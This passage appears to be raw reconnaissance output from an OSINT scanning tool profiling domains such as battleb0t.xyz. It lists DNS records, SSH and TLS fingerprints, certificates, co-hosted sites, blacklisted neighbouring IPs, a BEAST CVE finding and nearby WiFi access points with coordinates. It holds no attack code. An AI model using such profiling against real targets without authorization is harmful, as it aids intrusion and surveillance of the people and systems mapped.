"deadneighbor.com": {"record_type": "A", "resolved_at": "2023-03-22T10:33:56.952236337Z"}, "ruchit.tk": {"record_type": "A", "resolved_at": "2022-10-18T06:13:12.128806491Z"}, "zacyoungdale.com": {"record_type": "A", "resolved_at": "2022-10-18T05:11:14.822496438Z"}, "terra-viewer.sensehawk.com": {"record_type": "CNAME", "resolved_at": "2023-02-23T14:59:54.839469148Z"}, "cloud.cantoo.co": {"record_type": "CNAME", "resolved_at": "2023-04-11T13:23:47.629232056Z"}, "jeremy.mayeres.be": {"record_type": "CNAME", "resolved_at": "2023-02-19T12:18:54.480921504Z"}, "www.nifi.love": {"record_type": "CNAME", "resolved_at": "2023-04-24T18:42:23.444509655Z"}, "www.k8150.net": {"record_type": "CNAME", "resolved_at": "2023-01-23T20:10:36.824486514Z"}, "api.science.io": {"record_type": "A", "resolved_at": "2023-01-27T15:12:42.987078445Z"}, "www.scottmadethis.net": {"record_type": "CNAME", "resolved_at": "2023-04-16T19:40:39.283102532Z"}, "www.qwed.work": {"record_type": "CNAME", "resolved_at": "2022-12-27T16:50:33.603590310Z"}, "spbalcarcelart.com": {"record_type": "A", "resolved_at": 
"2023-04-04T16:23:47.949765963Z"}, "iaapassgen.tk": {"record_type": "A", "resolved_at": "2022-10-18T04:12:38.321708790Z"}, "feedback.nuhoc.com": {"record_type": "CNAME", "resolved_at": "2022-10-18T05:08:22.974703827Z"}}, "names": ["damagestudio.dev", "rhymeswithvirus.com", "www.javamate.net", "www.accasionmarquees.co.uk", "cloud.cantoo.co", | 35.229.48.116 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 02:44:16 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | keisharayne (Net ID: 00:1D:CE:8A:EF:D7) | 32.8608, -79.9746 |
| 2023-05-12 03:00:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.38): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:49 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chicago, Illinois, 60666, United States, North America | 172.67.135.9 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TATBIKAT MIMARLIK (Net ID: 00:14:C1:20:3F:E3) | 40.2024, 29.0398 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 1 | 0 | 2 | 0 | None | ply.gg | 185.199.111.153 |
| 2023-05-12 02:44:43 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8e:1e:a8:a7:dc:b4:b2:81:77:cc:05:85:bf:5a:da:1d:f4:11:
2f:79:e8:ea:90:50:cd:64:a1:df:43:64:b0:45:83:6a:9e:5d:
59:bc:d7:f8:c2:0e:5f:4b:d2:8c:3b:71:44:77:09:c9:00:b8:
05:73:a8:af:5c:03:95:2d:4c:ab:3f:94:8d:b8:ae:e1:f0:37:
e9:58:9a:a0:2c:5e:da:55:60:52:70:f6:59:b6:b8:74:c2:ec:
81:ab:60:cd:18:64:f8:84:94:8c:df:47:3c:58:34:38:f7:32:
95:4f:6b:ab:3c:d9:c8:9d:74:72:3d:d9:8b:b0:94:26:be:f8:
97:a5:76:6a:24:26:67:96:90:9d:13:49:6a:48:2d:e9:2e:38:
bc:3f:6a:f2:cd:6c:8d:0c:c9:e9:d6:d1:7b:0e:16:58:5f:02:
04:50:48:f9:7c:38:68:3b:60:03:bd:e1:08:78:5b:e8:18:86:
b7:4b:aa:6f:ff:a7:2b:03:04:25:27:96:1f:8f:09:53:64:fa:
5f:9b:e8:88:a7:a7:cf:f6:cb:48:fc:5c:9c:94:c2:c7:76:87:
81:e4:c9:14:d3:20:ef:9f:47:07:5f:b5:8a:d6:96:2d:57:a9:
f9:b6:6d:17:e3:16:11:39:ad:d4:74:7b:49:e0:ca:6b:a7:15:
ef:22:a3:8b
|
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.186): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:FF:0B) | 52.3759, 4.8975 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.129): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 134.97.148.34.bc.googleusercontent.com | 34.148.97.134 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.28): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:14:BF:A7:74:74) | 32.8608, -79.9746 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:75:F1:53) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | British Indian Ocean Territory | 01def.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | warriorforum (Category: hobby)
https://www.warriorforum.com/members/login.html | login |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.227): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000hen.github.io |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.192): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Speaker Deck (Category: social)
https://speakerdeck.com/login/ | login |
| 2023-05-12 03:09:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-108-154.github.com | 185.199.108.154 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \022\026\024\001\027\004\013\017\005\014\022\032\0 (Net ID: 00:09:5B:2F:26:42) | 39.0469, -77.4903 |
| 2023-05-12 03:12:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | 188.114.96.1 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.188): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 003marek.github.io | 185.199.111.153 |
| 2023-05-12 02:53:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 43CE:4ADD:8C38CD:9E6CB7:645D800F
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250056-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683849232.554003,VS0,VE234
Vary: Accept-Encoding
X-Fastly-Request-ID: c52142f897e3b3bde7efbc782ee478e7cae3ad86
| 2606:50c0:8003::153 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00-duino.github.io | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css | http://nuke.battleb0t.xyz/ |
| 2023-05-12 03:24:52 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United Kingdom | London, England, ENG, United Kingdom, GB |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ru_123rf (Category: hobby)
https://ru.123rf.com/profile_login | login |
| 2023-05-12 02:48:54 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
